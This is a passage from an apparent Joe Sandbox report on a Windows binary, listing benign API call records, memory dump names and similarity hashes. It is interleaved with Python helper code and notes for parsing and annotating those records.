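def summarize(calls: List[ApiCall]) -> List[str]:
    """One annotated line per call, e.g. '00445893 SendMessageW.USER32 WM_GETTEXTLENGTH'."""
    out = []
    for c in calls:
        where = f"{c.ref:08X}" + (f" (via {c.subcall:08X})" if c.subcall else "")
        out.append(f"{where} {c.api}.{c.module} {c.note}".rstrip())
    return out


# Both records copied from the report above.
RECORD_448B5C = """
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
  • Part of subcall function 00440D98: SendMessageW.USER32(017D1A90,000000F1,00000000,00000000), ref: 00440E6E
  • Part of subcall function 00440D98: SendMessageW.USER32(017D1A90,000000F1,00000001,00000000), ref: 00440E9A
"""
RECORD_445879 = """
• IsWindowVisible.USER32(?), ref: 00445879
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
• _wcslen.LIBCMT ref: 004458FB
• CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
"""

if __name__ == "__main__":
    for name, record in (("00448B5C", RECORD_448B5C), ("00445879", RECORD_445879)):
        calls = parse_api_lines(record)
        print(f"function {name}: reads window text = {reads_window_text(calls)}")
        print("\n".join("  " + s for s in summarize(calls)))
```

Run it as a script to print both records annotated; only 00445879 is flagged, and its CharUpperBuffW after the read suggests the title is upper-cased for a case-insensitive comparison, which is worth confirming in the disassembly rather than assuming from the API list alone.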

APIs
• DeleteObject.GDI32(00000000), ref: 004471D8
• ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
• SelectObject.GDI32(?,00000000), ref: 00447228
• BeginPath.GDI32(?), ref: 0044723D
• SelectObject.GDI32(?,00000000), ref: 00447266
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Object$Select$BeginCreateDeletePath
• String ID:
• API String ID: 2338827641-0
                                                                                                                                                                                                                                                            • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                                                                                                                                            • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2875609808-0
                                                                                                                                                                                                                                                            • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                                                                                                                                            • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                                                                                                            • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                                                                                                                                            • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4023252218-0
                                                                                                                                                                                                                                                            • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                                                                                                                                            • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
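The function records in this listing (call sites with their ref addresses, the dump they were carved from, and the Similarity IDs) are easier to pivot on once they are parsed. The following is an added example, not code from the report or from Joe Sandbox: a Python parser for this listing format that extracts each record's API call sequence, call-site addresses and Similarity fields, plus a reconstruction of the "API ID" from the listed API names. The reconstruction rule (CamelCase tokens, Win32 A/W suffix dropped, tokens grouped by occurrence count in descending order, "$" between groups, alphabetical within a group) is an assumption inferred from the records on this page, not documented tool behaviour; the GetDlgItem/EndDialog record shows the tool also strips prefixes such as Get/End and spells Dlg as Dialog, which the example deliberately does not model and reports as a mismatch. The sample input is constructed from this page's own lines with the indentation and link residue removed.

```python
"""Parse Joe Sandbox per-function records ("APIs / Memory Dump Source /
Similarity", the listing format on this page) into structured data, so API call
sequences, call-site addresses and similarity hashes can be pivoted on.
The API-ID reconstruction is an ASSUMPTION inferred from this page's records,
not documented Joe Sandbox behaviour."""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass, field

# Constructed sample: four records copied from this report's listing, with the
# page indentation and the "Download File" link residue removed.
SAMPLE = """\
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CounterPerformanceQuerySleep
• API String ID: 2875609808-0
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460C17
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
• MessageBeep.USER32(00000000), ref: 00460C46
• KillTimer.USER32(?,0000040A), ref: 00460C68
• EndDialog.USER32(?,00000001), ref: 00460C83
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
APIs
Similarity
• API ID: Destroy$DeleteObjectWindow$Icon
APIs
• SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Similarity
• API ID: DeleteDestroyObject$IconMessageSendWindow
"""

API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
SECTION_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: int  # virtual address of the call site


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)


def parse_records(text):
    """Each 'APIs' header starts a record; bullets after it are calls until the
    next section header, after which bullets are 'Key: value' fields."""
    records, rec, in_apis = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            rec, in_apis = FunctionRecord(), True
            records.append(rec)
        elif rec is None or not line:
            continue
        elif line in SECTION_HEADERS:
            in_apis = False
        elif in_apis:
            m = API_RE.match(line)
            if m:
                name, module, args, ref = m.groups()
                rec.apis.append(ApiCall(name, module, tuple(args.split(",")), int(ref, 16)))
        else:  # partition on the first ':' so 'Offset: ..., based on PE: true' stays intact
            key, _, value = line.lstrip("• ").partition(":")
            rec.fields[key.strip()] = value.strip()
    return records


def api_sequence(rec):
    """API names in call-site address order (what a behaviour rule keys on)."""
    return [c.name for c in sorted(rec.apis, key=lambda c: c.ref)]


def reconstruct_api_id(rec):
    """ASSUMED reconstruction of the 'API ID' field from the listed API names."""
    counts = Counter()
    for call in rec.apis:
        tokens = re.findall(r"[A-Z][a-z0-9]*", call.name)
        if tokens and tokens[-1] in ("A", "W"):  # Win32 ANSI/Unicode suffix
            tokens = tokens[:-1]
        counts.update(tokens)
    groups = defaultdict(list)
    for tok, n in counts.items():
        groups[n].append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


RECORDS = parse_records(SAMPLE)
```

Running `reconstruct_api_id` over `RECORDS` reproduces the page's IDs for the Sleep/QueryPerformanceCounter and DeleteObject/DestroyIcon records, returns an empty string for the record whose API list is absent on the page, and differs for the GetDlgItem record, which is where the tool's additional name normalisation shows up.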
APIs
• SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: DeleteDestroyObject$IconMessageSendWindow
• String ID:
• API String ID: 1489400265-0
• Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                                                                                                                            • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00455728
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1042038666-0
                                                                                                                                                                                                                                                            • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                                                                                                                                            • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2625713937-0
                                                                                                                                                                                                                                                            • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                                                                                                                                                            • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 0041780F
                                                                                                                                                                                                                                                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                                                                                                                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 00417826
                                                                                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 00417834
                                                                                                                                                                                                                                                            • __lock.LIBCMT ref: 00417844
                                                                                                                                                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 938513278-0
                                                                                                                                                                                                                                                            • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                                                                                                                            • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                                                                                                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                                                                                                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
• ___fls_setvalue@8.LIBCMT ref: 00413D3E
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
• ExitThread.KERNEL32 ref: 00413D4E
• GetCurrentThreadId.KERNEL32 ref: 00413D54
• __freefls@4.LIBCMT ref: 00413D74
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 2403457894-0
• Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
• Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
• Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
• Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
APIs
  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
• ___set_flsgetvalue.LIBCMT ref: 004151C0
  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
• ___fls_getvalue@4.LIBCMT ref: 004151CB
  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
• ___fls_setvalue@8.LIBCMT ref: 004151DD
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
• ExitThread.KERNEL32 ref: 004151ED
• __freefls@4.LIBCMT ref: 00415209
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
